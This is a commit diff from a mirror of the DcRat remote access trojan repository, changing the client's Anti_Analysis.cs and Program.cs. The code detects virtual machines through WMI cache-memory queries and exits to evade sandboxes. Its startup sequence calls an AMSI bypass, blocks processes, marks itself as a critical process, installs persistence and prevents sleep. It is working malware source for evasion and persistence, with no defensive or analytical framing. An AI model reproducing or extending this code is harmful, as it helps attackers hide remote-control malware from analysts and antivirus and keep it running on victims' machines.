qwqdanchun
/
DcRat
mirror of https://github.com/qwqdanchun/DcRat.git
1
0
Fork 0
Code Issues Projects Releases Wiki Activity

fix

This commit is contained in:
qwqdanchun 2021-10-10 21:15:51 +08:00
parent 09973e7a64
commit 38ed9013d9
2 changed files with 73 additions and 19 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

65
Client/Helper/Anti_Analysis.cs
View File

@ -1,11 +1,6 @@
using System;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Management;
using System.Net.NetworkInformation;
using System.Runtime.InteropServices;
using System.Text.RegularExpressions;
using System.Threading;
namespace Client.Helper
@ -15,21 +10,61 @@ namespace Client.Helper
{
public static void RunAntiAnalysis()
{
if (isVM_by_wim_temper())
if (!IsServerOS()&&isVM_by_wim_temper() )
{
Environment.FailFast(null);
}
Thread.Sleep(1000);
}
public static bool IsServerOS()
{
try
{
string computerName = Environment.MachineName;
ConnectionOptions options = new ConnectionOptions() { EnablePrivileges = true, Impersonation = ImpersonationLevel.Impersonate };
ManagementScope scope = new ManagementScope(string.Format(@"\\{0}\root\CIMV2", computerName), options);
ObjectQuery query = new ObjectQuery("SELECT * FROM Win32_OperatingSystem");
using (ManagementObjectSearcher searcher = new ManagementObjectSearcher(scope, query))
using (ManagementObjectCollection results = searcher.Get())
{
if (results.Count != 1) throw new ManagementException();
uint productType = (uint)results.OfType<ManagementObject>().First().Properties["ProductType"].Value;
switch (productType)
{
case 1:
return false;
case 2:
return true;
case 3:
return true;
default:
return false;
}
}
}
catch
{
return false;
}
}
public static bool isVM_by_wim_temper()
{
SelectQuery selectQuery = new SelectQuery("Select * from Win32_CacheMemory");
//SelectQuery selectQuery = new SelectQuery("Select * from CIM_Memory");
ManagementObjectSearcher searcher = new ManagementObjectSearcher(selectQuery);
int i = 0;
foreach (ManagementObject DeviceID in searcher.Get())
i++;
return (i < 2);
{
try
{
SelectQuery selectQuery = new SelectQuery("Select * from Win32_CacheMemory");
//SelectQuery selectQuery = new SelectQuery("Select * from CIM_Memory");
ManagementObjectSearcher searcher = new ManagementObjectSearcher(selectQuery);
int i = 0;
foreach (ManagementObject DeviceID in searcher.Get())
i++;
return (i < 2);
}
catch
{
return true;
}
}
}
}

27
Client/Program.cs
View File

@ -16,24 +16,43 @@ namespace Client
}
if (!Settings.InitializeSettings()) Environment.Exit(0);
try
{
if (Convert.ToBoolean(Settings.An_ti)) //run anti-virtual environment
Anti_Analysis.RunAntiAnalysis();
}
catch { }
A.B();//Amsi Bypass
try
{
if (!MutexControl.CreateMutex()) //if current payload is a duplicate
Environment.Exit(0);
}
catch { }
try
{
if (Convert.ToBoolean(Settings.Anti_Process)) //run AntiProcess
AntiProcess.StartBlock();
}
catch { }
try
{
if (Convert.ToBoolean(Settings.BS_OD) && Methods.IsAdmin()) //active critical process
ProcessCritical.Set();
}
catch { }
try
{
if (Convert.ToBoolean(Settings.In_stall)) //drop payload [persistence]
NormalStartup.Install();
Methods.PreventSleep(); //prevent pc to idle\sleep
}
catch { }
Methods.PreventSleep(); //prevent pc to idle\sleep
try
{
if (Methods.IsAdmin())
Methods.ClearSetting();
A.B();//Amsi Bypass
}
catch { }